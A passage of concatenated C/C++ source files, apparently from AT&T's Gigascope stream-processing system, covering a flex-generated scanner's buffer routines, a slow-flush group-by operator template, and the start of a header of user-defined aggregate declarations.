return EOB_ACT_LAST_MATCH;
}
}
/* Try to read more data. */
/* First move last chars to start of buffer. */
number_to_move = (yy_size_t) ((yy_c_buf_p) - (yytext_ptr)) - 1;
for ( i = 0; i < number_to_move; ++i )
*(dest++) = *(source++);
if ( YY_CURRENT_BUFFER_LVALUE->yy_buffer_status == YY_BUFFER_EOF_PENDING )
/* don't do the read, it's not guaranteed to return an EOF,
* just force an EOF
*/
YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars) = 0;
else
{
yy_size_t num_to_read =
YY_CURRENT_BUFFER_LVALUE->yy_buf_size - number_to_move - 1;
while ( num_to_read <= 0 )
{ /* Not enough room in the buffer - grow it. */
/* just a shorter name for the current buffer */
YY_BUFFER_STATE b = YY_CURRENT_BUFFER_LVALUE;
int yy_c_buf_p_offset =
(int) ((yy_c_buf_p) - b->yy_ch_buf);
if ( b->yy_is_our_buffer )
{
yy_size_t new_size = b->yy_buf_size * 2;
if ( new_size <= 0 )
b->yy_buf_size += b->yy_buf_size / 8;
else
b->yy_buf_size *= 2;
b->yy_ch_buf = (char *)
/* Include room in for 2 EOB chars. */
FtaParserrealloc((void *) b->yy_ch_buf,b->yy_buf_size + 2 );
}
else
/* Can't grow it, we don't own it. */
b->yy_ch_buf = 0;
if ( ! b->yy_ch_buf )
YY_FATAL_ERROR(
"fatal error - scanner input buffer overflow" );
(yy_c_buf_p) = &b->yy_ch_buf[yy_c_buf_p_offset];
num_to_read = YY_CURRENT_BUFFER_LVALUE->yy_buf_size -
number_to_move - 1;
}
if ( num_to_read > YY_READ_BUF_SIZE )
num_to_read = YY_READ_BUF_SIZE;
/* Read in more data. */
YY_INPUT( (&YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[number_to_move]),
(yy_n_chars), num_to_read );
YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars);
}
if ( (yy_n_chars) == 0 )
{
if ( number_to_move == YY_MORE_ADJ )
{
ret_val = EOB_ACT_END_OF_FILE;
FtaParserrestart(FtaParserin );
}
else
{
ret_val = EOB_ACT_LAST_MATCH;
YY_CURRENT_BUFFER_LVALUE->yy_buffer_status =
YY_BUFFER_EOF_PENDING;
}
}
else
ret_val = EOB_ACT_CONTINUE_SCAN;
if ((int) ((yy_n_chars) + number_to_move) > YY_CURRENT_BUFFER_LVALUE->yy_buf_size) {
/* Extend the array by 50%, plus the number we really need. */
int new_size = (yy_n_chars) + number_to_move + ((yy_n_chars) >> 1);
YY_CURRENT_BUFFER_LVALUE->yy_ch_buf = (char *) FtaParserrealloc((void *) YY_CURRENT_BUFFER_LVALUE->yy_ch_buf,new_size );
if ( ! YY_CURRENT_BUFFER_LVALUE->yy_ch_buf )
YY_FATAL_ERROR( "out of dynamic memory in yy_get_next_buffer()" );
}
(yy_n_chars) += number_to_move;
YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)] = YY_END_OF_BUFFER_CHAR;
YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars) + 1] = YY_END_OF_BUFFER_CHAR;
(yytext_ptr) = &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[0];
return ret_val;
}
/* yy_get_previous_state - get the state just before the EOB char was reached */
static yy_state_type yy_get_previous_state (void)
{
yy_state_type yy_current_state;
char *yy_cp;
yy_current_state = (yy_start);
for ( yy_cp = (yytext_ptr) + YY_MORE_ADJ; yy_cp < (yy_c_buf_p); ++yy_cp )
{
YY_CHAR yy_c = (*yy_cp ? yy_ec[YY_SC_TO_UI(*yy_cp)] : 1);
if ( yy_accept[yy_current_state] )
{
(yy_last_accepting_state) = yy_current_state;
(yy_last_accepting_cpos) = yy_cp;
}
while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state )
{
yy_current_state = (int) yy_def[yy_current_state];
if ( yy_current_state >= 692 )
yy_c = yy_meta[(unsigned int) yy_c];
}
yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c];
}
return yy_current_state;
}
/* yy_try_NUL_trans - try to make a transition on the NUL character
*
* synopsis
* next_state = yy_try_NUL_trans( current_state );
*/
static yy_state_type yy_try_NUL_trans (yy_state_type yy_current_state )
{
int yy_is_jam;
char *yy_cp = (yy_c_buf_p);
YY_CHAR yy_c = 1;
if ( yy_accept[yy_current_state] )
{
(yy_last_accepting_state) = yy_current_state;
(yy_last_accepting_cpos) = yy_cp;
}
while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state )
{
yy_current_state = (int) yy_def[yy_current_state];
if ( yy_current_state >= 692 )
yy_c = yy_meta[(unsigned int) yy_c];
}
yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c];
yy_is_jam = (yy_current_state == 691);
return yy_is_jam ? 0 : yy_current_state;
}
#ifndef YY_NO_UNPUT
static void yyunput (int c, char * yy_bp )
{
char *yy_cp;
yy_cp = (yy_c_buf_p);
/* undo effects of setting up FtaParsertext */
*yy_cp = (yy_hold_char);
if ( yy_cp < YY_CURRENT_BUFFER_LVALUE->yy_ch_buf + 2 )
{ /* need to shift things up to make room */
/* +2 for EOB chars. */
yy_size_t number_to_move = (yy_n_chars) + 2;
char *dest = &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[
YY_CURRENT_BUFFER_LVALUE->yy_buf_size + 2];
char *source =
&YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[number_to_move];
while ( source > YY_CURRENT_BUFFER_LVALUE->yy_ch_buf )
*--dest = *--source;
yy_cp += (int) (dest - source);
yy_bp += (int) (dest - source);
YY_CURRENT_BUFFER_LVALUE->yy_n_chars =
(yy_n_chars) = YY_CURRENT_BUFFER_LVALUE->yy_buf_size;
if ( yy_cp < YY_CURRENT_BUFFER_LVALUE->yy_ch_buf + 2 )
YY_FATAL_ERROR( "flex scanner push-back overflow" );
}
*--yy_cp = (char) c;
(yytext_ptr) = yy_bp;
(yy_hold_char) = *yy_cp;
(yy_c_buf_p) = yy_cp;
}
#endif
#ifndef YY_NO_INPUT
#ifdef __cplusplus
static int yyinput (void)
#else
static int input (void)
#endif
{
int c;
*(yy_c_buf_p) = (yy_hold_char);
if ( *(yy_c_buf_p) == YY_END_OF_BUFFER_CHAR )
{
/* yy_c_buf_p now points to the character we want to return.
* If this occurs *before* the EOB characters, then it's a
* valid NUL; if not, then we've hit the end of the buffer.
*/
if ( (yy_c_buf_p) < &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)] )
/* This was really a NUL. */
*(yy_c_buf_p) = '\0';
else
{ /* need more input */
yy_size_t offset = (yy_c_buf_p) - (yytext_ptr);
++(yy_c_buf_p);
switch ( yy_get_next_buffer( ) )
{
case EOB_ACT_LAST_MATCH:
/* This happens because yy_g_n_b()
* sees that we've accumulated a
* token and flags that we need to
* try matching the token before
* proceeding. But for input(),
* there's no matching to consider.
* So convert the EOB_ACT_LAST_MATCH
* to EOB_ACT_END_OF_FILE.
*/
/* Reset buffer status. */
FtaParserrestart(FtaParserin );
/*FALLTHROUGH*/
case EOB_ACT_END_OF_FILE:
{
if ( FtaParserwrap( ) )
return EOF;
if ( ! (yy_did_buffer_switch_on_eof) )
YY_NEW_FILE;
#ifdef __cplusplus
return yyinput();
#else
return input();
#endif
}
case EOB_ACT_CONTINUE_SCAN:
(yy_c_buf_p) = (yytext_ptr) + offset;
break;
}
}
}
c = *(unsigned char *) (yy_c_buf_p); /* cast for 8-bit char's */
*(yy_c_buf_p) = '\0'; /* preserve FtaParsertext */
(yy_hold_char) = *++(yy_c_buf_p);
return c;
}
#endif /* ifndef YY_NO_INPUT */
/** Immediately switch to a different input stream.
* @param input_file A readable stream.
*
* @note This function does not reset the start condition to @c INITIAL .
*/
void FtaParserrestart (FILE * input_file )
{
if ( ! YY_CURRENT_BUFFER ){
FtaParserensure_buffer_stack ();
YY_CURRENT_BUFFER_LVALUE =
FtaParser_create_buffer(FtaParserin,YY_BUF_SIZE );
}
FtaParser_init_buffer(YY_CURRENT_BUFFER,input_file );
FtaParser_load_buffer_state( );
}
/** Switch to a different input buffer.
* @param new_buffer The new input buffer.
*
*/
void FtaParser_switch_to_buffer (YY_BUFFER_STATE new_buffer )
{
/* TODO. We should be able to replace this entire function body
* with
* FtaParserpop_buffer_state();
* FtaParserpush_buffer_state(new_buffer);
*/
FtaParserensure_buffer_stack ();
if ( YY_CURRENT_BUFFER == new_buffer )
return;
if ( YY_CURRENT_BUFFER )
{
/* Flush out information for old buffer. */
*(yy_c_buf_p) = (yy_hold_char);
YY_CURRENT_BUFFER_LVALUE->yy_buf_pos = (yy_c_buf_p);
YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars);
}
YY_CURRENT_BUFFER_LVALUE = new_buffer;
FtaParser_load_buffer_state( );
/* We don't actually know whether we did this switch during
* EOF (FtaParserwrap()) processing, but the only time this flag
* is looked at is after FtaParserwrap() is called, so it's safe
* to go ahead and always set it.
*/
(yy_did_buffer_switch_on_eof) = 1;
}
static void FtaParser_load_buffer_state (void)
{
(yy_n_chars) = YY_CURRENT_BUFFER_LVALUE->yy_n_chars;
(yytext_ptr) = (yy_c_buf_p) = YY_CURRENT_BUFFER_LVALUE->yy_buf_pos;
FtaParserin = YY_CURRENT_BUFFER_LVALUE->yy_input_file;
(yy_hold_char) = *(yy_c_buf_p);
}
/** Allocate and initialize an input buffer state.
* @param file A readable stream.
* @param size The character buffer size in bytes. When in doubt, use @c YY_BUF_SIZE.
*
* @return the allocated buffer state.
*/
YY_BUFFER_STATE FtaParser_create_buffer (FILE * file, int size )
{
YY_BUFFER_STATE b;
b = (YY_BUFFER_STATE) FtaParseralloc(sizeof( struct yy_buffer_state ) );
if ( ! b )
YY_FATAL_ERROR( "out of dynamic memory in FtaParser_create_buffer()" );
b->yy_buf_size = (yy_size_t)size;
/* yy_ch_buf has to be 2 characters longer than the size given because
* we need to put in 2 end-of-buffer characters.
*/
b->yy_ch_buf = (char *) FtaParseralloc(b->yy_buf_size + 2 );
if ( ! b->yy_ch_buf )
YY_FATAL_ERROR( "out of dynamic memory in FtaParser_create_buffer()" );
b->yy_is_our_buffer = 1;
FtaParser_init_buffer(b,file );
return b;
}
/** Destroy the buffer.
* @param b a buffer created with FtaParser_create_buffer()
*
*/
void FtaParser_delete_buffer (YY_BUFFER_STATE b )
{
if ( ! b )
return;
if ( b == YY_CURRENT_BUFFER ) /* Not sure if we should pop here. */
YY_CURRENT_BUFFER_LVALUE = (YY_BUFFER_STATE) 0;
if ( b->yy_is_our_buffer )
FtaParserfree((void *) b->yy_ch_buf );
FtaParserfree((void *) b );
}
/* Initializes or reinitializes a buffer.
* This function is sometimes called more than once on the same buffer,
* such as during a FtaParserrestart() or at EOF.
*/
static void FtaParser_init_buffer (YY_BUFFER_STATE b, FILE * file )
{
int oerrno = errno;
FtaParser_flush_buffer(b );
b->yy_input_file = file;
b->yy_fill_buffer = 1;
/* If b is the current buffer, then FtaParser_init_buffer was _probably_
* called from FtaParserrestart() or through yy_get_next_buffer.
* In that case, we don't want to reset the lineno or column.
*/
if (b != YY_CURRENT_BUFFER){
b->yy_bs_lineno = 1;
b->yy_bs_column = 0;
}
b->yy_is_interactive = file ? (isatty( fileno(file) ) > 0) : 0;
errno = oerrno;
}
/** Discard all buffered characters. On the next scan, YY_INPUT will be called.
* @param b the buffer state to be flushed, usually @c YY_CURRENT_BUFFER.
*
*/
void FtaParser_flush_buffer (YY_BUFFER_STATE b )
{
if ( ! b )
return;
b->yy_n_chars = 0;
/* We always need two end-of-buffer characters. The first causes
* a transition to the end-of-buffer state. The second causes
* a jam in that state.
*/
b->yy_ch_buf[0] = YY_END_OF_BUFFER_CHAR;
b->yy_ch_buf[1] = YY_END_OF_BUFFER_CHAR;
b->yy_buf_pos = &b->yy_ch_buf[0];
b->yy_at_bol = 1;
b->yy_buffer_status = YY_BUFFER_NEW;
if ( b == YY_CURRENT_BUFFER )
FtaParser_load_buffer_state( );
}
/** Pushes the new state onto the stack. The new state becomes
* the current state. This function will allocate the stack
* if necessary.
* @param new_buffer The new state.
*
*/
void FtaParserpush_buffer_state (YY_BUFFER_STATE new_buffer )
{
if (new_buffer == NULL)
return;
FtaParserensure_buffer_stack();
/* This block is copied from FtaParser_switch_to_buffer. */
if ( YY_CURRENT_BUFFER )
{
/* Flush out information for old buffer. */
*(yy_c_buf_p) = (yy_hold_char);
YY_CURRENT_BUFFER_LVALUE->yy_buf_pos = (yy_c_buf_p);
YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars);
}
/* Only push if top exists. Otherwise, replace top. */
if (YY_CURRENT_BUFFER)
(yy_buffer_stack_top)++;
YY_CURRENT_BUFFER_LVALUE = new_buffer;
/* copied from FtaParser_switch_to_buffer. */
FtaParser_load_buffer_state( );
(yy_did_buffer_switch_on_eof) = 1;
}
/** Removes and deletes the top of the stack, if present.
* The next element becomes the new top.
*
*/
void FtaParserpop_buffer_state (void)
{
if (!YY_CURRENT_BUFFER)
return;
FtaParser_delete_buffer(YY_CURRENT_BUFFER );
YY_CURRENT_BUFFER_LVALUE = NULL;
if ((yy_buffer_stack_top) > 0)
--(yy_buffer_stack_top);
if (YY_CURRENT_BUFFER) {
FtaParser_load_buffer_state( );
(yy_did_buffer_switch_on_eof) = 1;
}
}
/* Allocates the stack if it does not exist.
* Guarantees space for at least one push.
*/
static void FtaParserensure_buffer_stack (void)
{
yy_size_t num_to_alloc;
if (!(yy_buffer_stack)) {
/* First allocation is just for 2 elements, since we don't know if this
* scanner will even need a stack. We use 2 instead of 1 to avoid an
* immediate realloc on the next call.
*/
num_to_alloc = 1; /* After all that talk, this was set to 1 anyways... */
(yy_buffer_stack) = (struct yy_buffer_state**)FtaParseralloc
(num_to_alloc * sizeof(struct yy_buffer_state*)
);
if ( ! (yy_buffer_stack) )
YY_FATAL_ERROR( "out of dynamic memory in FtaParserensure_buffer_stack()" );
memset((yy_buffer_stack), 0, num_to_alloc * sizeof(struct yy_buffer_state*));
(yy_buffer_stack_max) = num_to_alloc;
(yy_buffer_stack_top) = 0;
return;
}
if ((yy_buffer_stack_top) >= ((yy_buffer_stack_max)) - 1){
/* Increase the buffer to prepare for a possible push. */
yy_size_t grow_size = 8 /* arbitrary grow size */;
num_to_alloc = (yy_buffer_stack_max) + grow_size;
(yy_buffer_stack) = (struct yy_buffer_state**)FtaParserrealloc
((yy_buffer_stack),
num_to_alloc * sizeof(struct yy_buffer_state*)
);
if ( ! (yy_buffer_stack) )
YY_FATAL_ERROR( "out of dynamic memory in FtaParserensure_buffer_stack()" );
/* zero only the new slots.*/
memset((yy_buffer_stack) + (yy_buffer_stack_max), 0, grow_size * sizeof(struct yy_buffer_state*));
(yy_buffer_stack_max) = num_to_alloc;
}
}
/** Setup the input buffer state to scan directly from a user-specified character buffer.
* @param base the character buffer
* @param size the size in bytes of the character buffer
*
* @return the newly allocated buffer state object.
*/
YY_BUFFER_STATE FtaParser_scan_buffer (char * base, yy_size_t size )
{
YY_BUFFER_STATE b;
if ( size < 2 ||
base[size-2] != YY_END_OF_BUFFER_CHAR ||
base[size-1] != YY_END_OF_BUFFER_CHAR )
/* They forgot to leave room for the EOB's. */
return 0;
b = (YY_BUFFER_STATE) FtaParseralloc(sizeof( struct yy_buffer_state ) );
if ( ! b )
YY_FATAL_ERROR( "out of dynamic memory in FtaParser_scan_buffer()" );
b->yy_buf_size = size - 2; /* "- 2" to take care of EOB's */
b->yy_buf_pos = b->yy_ch_buf = base;
b->yy_is_our_buffer = 0;
b->yy_input_file = 0;
b->yy_n_chars = b->yy_buf_size;
b->yy_is_interactive = 0;
b->yy_at_bol = 1;
b->yy_fill_buffer = 0;
b->yy_buffer_status = YY_BUFFER_NEW;
FtaParser_switch_to_buffer(b );
return b;
}
/** Setup the input buffer state to scan a string. The next call to FtaParserlex() will
* scan from a @e copy of @a str.
* @param yystr a NUL-terminated string to scan
*
* @return the newly allocated buffer state object.
* @note If you want to scan bytes that may contain NUL values, then use
* FtaParser_scan_bytes() instead.
*/
YY_BUFFER_STATE FtaParser_scan_string (yyconst char * yystr )
{
return FtaParser_scan_bytes(yystr,strlen(yystr) );
}
/** Setup the input buffer state to scan the given bytes. The next call to FtaParserlex() will
* scan from a @e copy of @a bytes.
* @param yybytes the byte buffer to scan
* @param _yybytes_len the number of bytes in the buffer pointed to by @a bytes.
*
* @return the newly allocated buffer state object.
*/
YY_BUFFER_STATE FtaParser_scan_bytes (yyconst char * yybytes, yy_size_t _yybytes_len )
{
YY_BUFFER_STATE b;
char *buf;
yy_size_t n;
yy_size_t i;
/* Get memory for full buffer, including space for trailing EOB's. */
n = _yybytes_len + 2;
buf = (char *) FtaParseralloc(n );
if ( ! buf )
YY_FATAL_ERROR( "out of dynamic memory in FtaParser_scan_bytes()" );
for ( i = 0; i < _yybytes_len; ++i )
buf[i] = yybytes[i];
buf[_yybytes_len] = buf[_yybytes_len+1] = YY_END_OF_BUFFER_CHAR;
b = FtaParser_scan_buffer(buf,n );
if ( ! b )
YY_FATAL_ERROR( "bad buffer in FtaParser_scan_bytes()" );
/* It's okay to grow etc. this buffer, and we should throw it
* away when we're done.
*/
b->yy_is_our_buffer = 1;
return b;
}
#ifndef YY_EXIT_FAILURE
#define YY_EXIT_FAILURE 2
#endif
static void yy_fatal_error (yyconst char* msg )
{
(void) fprintf( stderr, "%s\n", msg );
exit( YY_EXIT_FAILURE );
}
/* Redefine yyless() so it works in section 3 code. */
#undef yyless
#define yyless(n) \
do \
{ \
/* Undo effects of setting up FtaParsertext. */ \
int yyless_macro_arg = (n); \
YY_LESS_LINENO(yyless_macro_arg);\
FtaParsertext[FtaParserleng] = (yy_hold_char); \
(yy_c_buf_p) = FtaParsertext + yyless_macro_arg; \
(yy_hold_char) = *(yy_c_buf_p); \
*(yy_c_buf_p) = '\0'; \
FtaParserleng = yyless_macro_arg; \
} \
while ( 0 )
/* Accessor methods (get/set functions) to struct members. */
/** Get the current line number.
*
*/
int FtaParserget_lineno (void)
{
return FtaParserlineno;
}
/** Get the input stream.
*
*/
FILE *FtaParserget_in (void)
{
return FtaParserin;
}
/** Get the output stream.
*
*/
FILE *FtaParserget_out (void)
{
return FtaParserout;
}
/** Get the length of the current token.
*
*/
yy_size_t FtaParserget_leng (void)
{
return FtaParserleng;
}
/** Get the current token.
*
*/
char *FtaParserget_text (void)
{
return FtaParsertext;
}
/** Set the current line number.
* @param _line_number line number
*
*/
void FtaParserset_lineno (int _line_number )
{
FtaParserlineno = _line_number;
}
/** Set the input stream. This does not discard the current
* input buffer.
* @param _in_str A readable stream.
*
* @see FtaParser_switch_to_buffer
*/
void FtaParserset_in (FILE * _in_str )
{
FtaParserin = _in_str ;
}
void FtaParserset_out (FILE * _out_str )
{
FtaParserout = _out_str ;
}
int FtaParserget_debug (void)
{
return FtaParser_flex_debug;
}
void FtaParserset_debug (int _bdebug )
{
FtaParser_flex_debug = _bdebug ;
}
static int yy_init_globals (void)
{
/* Initialization is the same as for the non-reentrant scanner.
* This function is called from FtaParserlex_destroy(), so don't allocate here.
*/
(yy_buffer_stack) = 0;
(yy_buffer_stack_top) = 0;
(yy_buffer_stack_max) = 0;
(yy_c_buf_p) = (char *) 0;
(yy_init) = 0;
(yy_start) = 0;
/* Defined in main.c */
#ifdef YY_STDINIT
FtaParserin = stdin;
FtaParserout = stdout;
#else
FtaParserin = (FILE *) 0;
FtaParserout = (FILE *) 0;
#endif
/* For future reference: Set errno on error, since we are called by
* FtaParserlex_init()
*/
return 0;
}
/* FtaParserlex_destroy is for both reentrant and non-reentrant scanners. */
int FtaParserlex_destroy (void)
{
/* Pop the buffer stack, destroying each element. */
while(YY_CURRENT_BUFFER){
FtaParser_delete_buffer(YY_CURRENT_BUFFER );
YY_CURRENT_BUFFER_LVALUE = NULL;
FtaParserpop_buffer_state();
}
/* Destroy the stack itself. */
FtaParserfree((yy_buffer_stack) );
(yy_buffer_stack) = NULL;
/* Reset the globals. This is important in a non-reentrant scanner so the next time
* FtaParserlex() is called, initialization will occur. */
yy_init_globals( );
return 0;
}
/*
* Internal utility routines.
*/
#ifndef yytext_ptr
static void yy_flex_strncpy (char* s1, yyconst char * s2, int n )
{
int i;
for ( i = 0; i < n; ++i )
s1[i] = s2[i];
}
#endif
#ifdef YY_NEED_STRLEN
static int yy_flex_strlen (yyconst char * s )
{
int n;
for ( n = 0; s[n]; ++n )
;
return n;
}
#endif
void *FtaParseralloc (yy_size_t size )
{
return (void *) malloc( size );
}
void *FtaParserrealloc (void * ptr, yy_size_t size )
{
/* The cast to (char *) in the following accommodates both
* implementations that use char* generic pointers, and those
* that use void* generic pointers. It works with the latter
* because both ANSI C and C++ allow castless assignment from
* any pointer type to void*, and deal with argument conversions
* as though doing an assignment.
*/
return (void *) realloc( (char *) ptr, size );
}
void FtaParserfree (void * ptr )
{
free( (char *) ptr ); /* see FtaParserrealloc() for (char *) cast */
}
#define YYTABLES_NAME "yytables"
#line 262 "fta.l"
int my_FtaParser_yyinput(char *buf, int max_size){
int c = 0;
int inchar = 0;
if(flex_fta_stringinput != NULL){
while(c<max_size){
if(flex_fta_stringinput[flex_fta_stringinput_ptr] != '\0'){
buf[c++] = flex_fta_stringinput[flex_fta_stringinput_ptr++];
}else{
break;
}
}
return(c);
}
if(flex_fta_fileinput != NULL){
while(c < max_size){
inchar = getc(flex_fta_fileinput);
if(inchar != EOF){
buf[c++] = inchar;
}else{
break;
}
}
return(c);
}
return(0);
}
void FtaParser_setfileinput(FILE *f){
FtaParserrestart(NULL);
flex_fta_fileinput = f;
flex_fta_stringinput = NULL;
flex_fta_lineno = 1;
flex_fta_ch = 0;
}
void FtaParser_setstringinput(char *s){
FtaParserrestart(NULL);
flex_fta_fileinput = NULL;
flex_fta_stringinput = s;
flex_fta_stringinput_ptr = 0;
flex_fta_lineno = 1;
flex_fta_ch = 0;
}
<file_sep>/** ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef GROUPBY_SLOWFLUSH_OPERATOR_H
#define GROUPBY_OPERATOR_H
#include "host_tuple.h"
#include "base_operator.h"
#include <list>
#include "hash_table.h"
#define _HFTA_SLOW_FLUSH
using namespace std;
template <class groupby_func, class group, class aggregate, class hasher_func, class equal_func>
class groupby_slowflush_operator : public base_operator {
private :
groupby_func func;
hash_table<group, aggregate, hasher_func, equal_func> group_table[2];
bool flush_finished;
unsigned int curr_table;
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator flush_pos;
int n_patterns;
int gb_per_flush;
public:
groupby_slowflush_operator(int schema_handle, const char* name) : base_operator(name), func(schema_handle) {
flush_finished = true;
curr_table = 0;
flush_pos = group_table[1-curr_table].end();
n_patterns = func.n_groupby_patterns();
gb_per_flush = func.gb_flush_per_tuple();
}
int accept_tuple(host_tuple& tup, list<host_tuple>& result) {
// Push out completed groups
if(!flush_finished) partial_flush(result);
// extract the key information from the tuple and
// copy it into buffer
group grp;
if (!func.create_group(tup, (gs_sp_t)&grp)) {
if(func.disordered()){
// fprintf(stderr,"Out of order record in %s\n",op_name);
return 0;
}
if (func.flush_needed()){
flush_old(result);
}
if (func.temp_status_received()) {
host_tuple temp_tup;
if (!func.create_temp_status_tuple(temp_tup, flush_finished)) {
temp_tup.channel = output_channel;
result.push_back(temp_tup);
}
}
tup.free_tuple();
return 0;
}
if(func.disordered()){
// fprintf(stderr,"Out of order record in %s\n",op_name);
return 0;
}
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator iter;
if ((iter = group_table[curr_table].find(grp)) != group_table[curr_table].end()) {
// Temporal GBvar is part of the group so no flush is needed.
func.update_aggregate(tup, grp, (*iter).second);
}else{
if (func.flush_needed()) {
flush_old(result);
}
if(n_patterns <= 1){
char aggr_buffer[sizeof(aggregate)];
// create an aggregate in preallocated buffer
func.create_aggregate(tup, aggr_buffer);
// neeed operator= doing a deep copy
group_table[curr_table].insert(grp, (*(aggregate*)aggr_buffer));
}else{
int p;
for(p=0;p<n_patterns;++p){
// TODO this code is wrong need to check each pattern to see if its in the table
// need shallow copy constructor for groups
group new_grp(grp, func.get_pattern(p));
char aggr_buffer[sizeof(aggregate)];
func.create_aggregate(tup, aggr_buffer);
// neeed operator= doing a deep copy
group_table[curr_table].insert(new_grp, (*(aggregate*)aggr_buffer));
}
}
}
tup.free_tuple();
return 0;
}
int partial_flush(list<host_tuple>& result) {
host_tuple tup;
unsigned int old_table = 1-curr_table;
unsigned int i;
// emit up to _GB_FLUSH_PER_TABLE_ output tuples.
if (!group_table[old_table].empty()) {
for (i=0; flush_pos != group_table[old_table].end() && i<gb_per_flush; ++flush_pos, ++i) {
bool failed = false;
tup = func.create_output_tuple((*flush_pos).first,(*flush_pos).second, failed);
if (!failed) {
tup.channel = output_channel;
result.push_back(tup);
}
// free((*flush_pos).second);
}
}
// Finalize processing if empty.
if(flush_pos == group_table[old_table].end()) {
flush_finished = true;
group_table[old_table].clear();
group_table[old_table].resize();
}
return 0;
}
int flush(list<host_tuple>& result) {
host_tuple tup;
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator iter;
unsigned int old_table = 1-curr_table;
// If the old table isn't empty, flush it now.
if (!group_table[old_table].empty()) {
for (; flush_pos != group_table[old_table].end(); ++flush_pos) {
bool failed = false;
tup = func.create_output_tuple((*flush_pos).first,(*flush_pos).second, failed);
if (!failed) {
tup.channel = output_channel;
result.push_back(tup);
}
// free((*flush_pos).second);
}
group_table[old_table].clear();
group_table[old_table].resize();
}
flush_pos = group_table[curr_table].begin();
// If the table isn't empty, flush it now.
if (!group_table[curr_table].empty()) {
for (; flush_pos != group_table[curr_table].end(); ++flush_pos) {
bool failed = false;
tup = func.create_output_tuple((*flush_pos).first,(*flush_pos).second, failed);
if (!failed) {
tup.channel = output_channel;
result.push_back(tup);
}
// free((*flush_pos).second);
}
group_table[curr_table].clear();
}
flush_finished = true;
return 0;
}
int flush_old(list<host_tuple>& result) {
host_tuple tup;
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator iter;
unsigned int old_table = 1-curr_table;
// If the old table isn't empty, flush it now.
if (!group_table[old_table].empty()) {
for (; flush_pos != group_table[old_table].end(); ++flush_pos) {
bool failed = false;
tup = func.create_output_tuple((*flush_pos).first,(*flush_pos).second, failed);
if (!failed) {
tup.channel = output_channel;
result.push_back(tup);
}
// free((*flush_pos).second);
}
//group_table[old_table].clear();
//group_table[old_table].resize();
}
group_table[old_table].clear();
group_table[old_table].resize();
// swap tables, enable partial flush processing.
flush_pos = group_table[curr_table].begin();
curr_table = old_table;
flush_finished = false;
return 0;
}
int set_param_block(int sz, void * value) {
func.set_param_block(sz, value);
return 0;
}
int get_temp_status(host_tuple& result) {
result.channel = output_channel;
return func.create_temp_status_tuple(result, flush_finished);
}
int get_blocked_status () {
return -1;
}
unsigned int get_mem_footprint() {
return group_table[0].get_mem_footprint() + group_table[1].get_mem_footprint();
}
};
#endif // GROUPBY_OPERATOR_H
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef _HFTA_UDAF_H_INCLUDED_
#define _HFTA_UDAF_H_INCLUDED_
#include "vstring.h"
#include "host_tuple.h"
#include "gsconfig.h"
// -------------------------------------------------------------------
// sum over 3 intervals : test rUDAF
void sum3_HFTA_AGGR_INIT_(gs_sp_t buf) ;
void sum3_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_uint32_t s) ;
void sum3_HFTA_AGGR_OUTPUT_(gs_uint32_t *result, gs_sp_t buf) ;
void sum3_HFTA_AGGR_DESTROY_(gs_sp_t buf) ;
void sum3_HFTA_AGGR_REINIT_( gs_sp_t buf) ;
// -------------------------------------------------------------------
// running sum over arbitrary intervals.
void moving_sum_udaf_HFTA_AGGR_INIT_(gs_sp_t buf) ;
void moving_sum_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_uint32_t s, gs_uint32_t N) ;
void moving_sum_udaf_HFTA_AGGR_OUTPUT_(gs_uint64_t *result, gs_sp_t buf) ;
void moving_sum_udaf_HFTA_AGGR_DESTROY_(gs_sp_t buf) ;
void moving_sum_udaf_HFTA_AGGR_REINIT_( gs_sp_t buf) ;
#define super_moving_sum_udaf_HFTA_AGGR_INIT_ moving_sum_udaf_HFTA_AGGR_INIT_
void super_moving_sum_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_uint64_t s) ;
#define super_moving_sum_udaf_HFTA_AGGR_OUTPUT_ moving_sum_udaf_HFTA_AGGR_OUTPUT_
#define super_moving_sum_udaf_HFTA_AGGR_DESTROY_ moving_sum_udaf_HFTA_AGGR_DESTROY_
#define super_moving_sum_udaf_HFTA_AGGR_REINIT_ moving_sum_udaf_HFTA_AGGR_REINIT_
gs_uint32_t moving_sum_extract(gs_uint64_t result);
gs_float_t moving_sum_extract_exp(gs_uint64_t result, gs_float_t alpha);
/////////////////////////////////////////////////////////////////////////
///// Calculate the average of all positive float numbers
void POSAVG_HFTA_AGGR_INIT_(gs_sp_t buf);
